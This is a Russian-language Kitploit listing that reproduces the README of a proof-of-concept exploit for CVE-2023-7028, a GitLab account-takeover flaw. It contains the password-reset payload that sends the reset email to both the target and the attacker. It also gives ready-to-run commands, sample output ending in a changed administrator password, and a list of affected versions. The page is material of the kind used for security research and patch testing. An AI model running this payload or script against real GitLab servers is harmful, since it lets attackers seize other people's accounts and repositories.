Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-7028-Account-Take-Over-Gitlab — Эксплойт proof-of-concept для CVE-2023-7028, автоматизирующий захват учётной записи GitLab через манипуляцию письмом сброса пароля. Включает интеграцию с temp-mail и поддержку собственного email атакующего. | Kitploit
Инструменты/GitHubGitHub/shimon03/cve-2023-7028-account-take-over-gitlab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubshimon03/cve-2023-7028-account-take-over-gitlab

CVE-2023-7028-Account-Take-Over-Gitlab

Эксплойт proof-of-concept для CVE-2023-7028, автоматизирующий захват учётной записи GitLab через манипуляцию письмом сброса пароля. Включает интеграцию с temp-mail и поддержку собственного email атакующего.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-7028 | Захват учётной записи GitLab

Отказ от ответственности

Этот код является доказательством концепции уязвимости, я никого не призываю использовать его на экземплярах GitLab, которые им не принадлежат.
Этот инструмент был разработан только для исследовательских и образовательных целей, и я не несу ответственности за любое его использование.

Описание:

CVE-2023-7028 относится к уязвимости захвата учётной записи (Account-Take-Over), которая позволяет пользователям получить контроль над учётной записью администратора GitLab без взаимодействия с пользователем.

Уязвимость заключается в управлении электронными письмами при сбросе паролей. Злоумышленник может указать 2 адреса электронной почты, и код сброса будет отправлен на оба.
Таким образом, можно указать адрес электронной почты целевой учётной записи, а также адрес злоумышленника, и сбросить пароль администратора.
(GitLab отмечает, что двухфакторная аутентификация предотвращает эксплуатацию этой уязвимости, поскольку злоумышленник, даже после сброса пароля, не сможет войти в систему.)

Эта уязвимость была обнаружена asterion04

Полезная нагрузка:

Вот пример полезной нагрузки

root@kitploit:~
user[email][][email protected]&user[email][][email protected]

POC:

Метод 1: Использование временной почты
root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected]

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: [email protected]
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for [email protected]
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: l3mG2v2XN4UBzbN18ZkW
Метод 2: Использование почты злоумышленника
root@kitploit:~
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t [email protected] -e [email protected]

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to [email protected] and [email protected] !
        Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: [email protected]
        Password: EU7XIYjlawjb5tH2jgmU

Справка

root@kitploit:~
$ python3 .\CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL -t TARGET [-e EVIL]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Gitlab url
  -t TARGET, --target TARGET
                        Target email
  -e EVIL, --evil EVIL  Evil email
  -p PASSWORD, --password PASSWORD
                        Password

Примечание:

Без опции --evil, которая указывает адрес электронной почты злоумышленника, скрипт использует публичную временную почту для поиска ссылки на сброс пароля.
=> Будьте осторожны, если этот POC используется во время пентеста.

Затронутые версии

  • 16.1 to 16.1.5
  • 16.2 to 16.2.8
  • 16.3 to 16.3.6
  • 16.4 to 16.4.4
  • 16.5 to 16.5.5
  • 16.6 to 16.6.3
  • 16.7 to 16.7.1

Ссылки:

  • https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
  • https://docs.gitlab.com/ee/install/docker.html
  • https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0030/
Скачать инструмент